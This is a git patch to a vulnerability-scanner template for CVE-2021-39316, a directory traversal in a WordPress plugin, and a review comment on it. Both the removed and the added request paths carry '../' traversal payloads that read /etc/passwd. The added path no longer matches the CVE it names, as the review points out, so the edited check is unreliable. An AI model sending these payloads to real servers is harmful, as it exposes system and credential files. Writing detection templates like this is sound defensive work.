From 51231d0ea618c1152dd71d2577873f13c47754be Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Sun, 27 Feb 2022 21:13:00 +0530
Subject: [PATCH] Add files via upload
---
cves/2021/CVE-2021-39316.yaml | 52 ++++++++++++++---------------------
1 file changed, 20 insertions(+), 32 deletions(-)
diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml
index 693e3bd541..bf881c3819 100644
--- a/cves/2021/CVE-2021-39316.yaml
+++ b/cves/2021/CVE-2021-39316.yaml
@@ -1,32 +1,20 @@
-id: CVE-2021-39316
-
-info:
- name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
- author: daffainfo
- severity: high
- description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
- reference:
- - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
- tags: wordpress,cve2021,cve,lfi,wp-plugin
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
- cve-id: CVE-2021-39316
- cwe-id: CWE-22
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
+id: CVE-2021-39316
+info:
+ name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
+ author: pussycat0x
+ severity: high
+ description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the dzsap_download action using directory traversal in the link parameter.
+ reference: https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
+ tags: lfi,wordpress
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ - type: status
+ status:
+ - 200
\ No newline at end of file
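Review bot: The new `path` entry requests `/api/downloads?fileName=…`, while the `id`, `name` and `description` kept in this hunk still attribute the finding to CVE-2021-39316 through the `dzsap_download` action and its `link` parameter, so the check no longer exercises the endpoint it reports on. A scan would then miss affected Zoomsounds installs and would label any unrelated host that answers that path with a passwd-like body as this CVE. If the new request belongs to a different issue, it should live in its own template file with its own `id`; otherwise the removed `/?action=dzsap_download&link=…` path should stay. The hunk also drops the `classification` block (`cve-id`, `cwe-id`, `cvss-metrics`), the CVE reference and the `cve,cve2021,wp-plugin` tags that tag-based selection and triage depend on, and overwrites the original `author`; those are worth restoring. Ending the file with a newline would also clear the `\ No newline at end of file` marker.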